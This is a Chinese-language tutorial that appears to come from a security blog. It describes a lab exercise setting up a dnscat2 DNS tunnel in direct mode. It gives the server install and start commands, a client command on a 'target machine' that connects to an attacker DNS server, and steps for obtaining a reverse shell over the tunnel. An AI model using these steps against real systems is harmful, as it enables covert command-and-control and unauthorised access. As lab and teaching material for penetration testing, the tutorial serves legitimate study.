网络安全内网渗透之DNS隧道实验--dnscat2直连模式

目录

一、DNS隧道攻击原理

二、DNS隧道工具

(一)安装dnscat2服务端

(二)启动服务器端

(三)在目标机器上安装客户端

(四)反弹shell


一、DNS隧道攻击原理

        在进行DNS查询时,如果查询的域名不在DNS服务器本机的缓存中,就会访问互联网进行查询,然后返回结果。入股哦在互联网上有一台定制的服务器,那么依靠DNS协议即可进行数据包的交换。从DNS协议的角度看,这样的操作只是在一次次地查询某个特定的域名并得到解析结果,但其本质问题是,预期的返回结果应该是一个IP地址,而事实上不是--返回的可以是任意字符串,包括加密的C&C指令。

二、DNS隧道工具

        Dnscat2是一款开源软件,它使用DNS协议创建加密的C&C通信,通过预共享密钥进行身份验证;使用shell及DNS查询类型(A、AAAA、TXT、CNAME、MX),多个同时进行的会话类似SSH中的隧道。Dnscat2的客户端使用C语言编写的,服务端是用Ruby语言编写的。

        使用dnscat2隧道的模式有两种,分别是直连模式和中继模式。

        直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求;

        中继模式:DNS经过互联网的迭代解析,指向指定的DNS服务器。与直连模式相比,中继模式的速度较慢。

        如果内网放行所有的DNS请求,dnscat2会使用直连模式,通过UDP的53端口进行通信(不需要域名,速度快,而且看上去仍然像普通的DNS查询)。在请求日志中,所有的域名都是以“dnscat”开头的,因此防火墙可以很容易地将直连模式的通信检测出来。

        如果内网中的请求仅限于白名单服务器或者特定的域,dnscat2会使用中继模式来申请一个域名,并将运行dnscat2服务端的服务器指定为受信任的DNS服务器。

        本章实验以直连模式为测试模式。

(一)安装dnscat2服务端

        dnscat2使用ubuntu系统,安装命令如下:

​
apt-get install -y gem

apt-get install -y ruby-dev(注意安装的时候系统崩了,重启后使用命令dpkg --configure -a)

apt-get install -y libpq-dev

apt-get install -y ruby-bundler

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server

bundle install

(二)启动服务器端

ruby dnscat2.rb

网络安全内网渗透之DNS隧道实验--dnscat2直连模式_第1张图片

(三)在目标机器上安装客户端

​git clone https://github.com/iagox86/dnscat2.git

        不能在线git clone的话,使用其他方式上传到目标主机。

cd dnscat2/client/

make

./dnscat --dns server=192.168.101.105,port=53 --secret=9fb91ae03a857d46bd2c9b19ea9ef13a

        结果如下:

网络安全内网渗透之DNS隧道实验--dnscat2直连模式_第2张图片

        服务端结果如下:

网络安全内网渗透之DNS隧道实验--dnscat2直连模式_第3张图片

(四)反弹shell

        使用windows查看可以连接的会话

        window -i 1连接到会话1

网络安全内网渗透之DNS隧道实验--dnscat2直连模式_第4张图片

        help查看命令

网络安全内网渗透之DNS隧道实验--dnscat2直连模式_第5张图片

        shell命令执行后,创建window 4

        使用window -i 4进入交互会话,ifconfig可以看到被控主机的IP是192.168.101.106,也就是dnscat客户端主机的IP地址

网络安全内网渗透之DNS隧道实验--dnscat2直连模式_第6张图片

你可能感兴趣的:(网络安全,web安全,安全)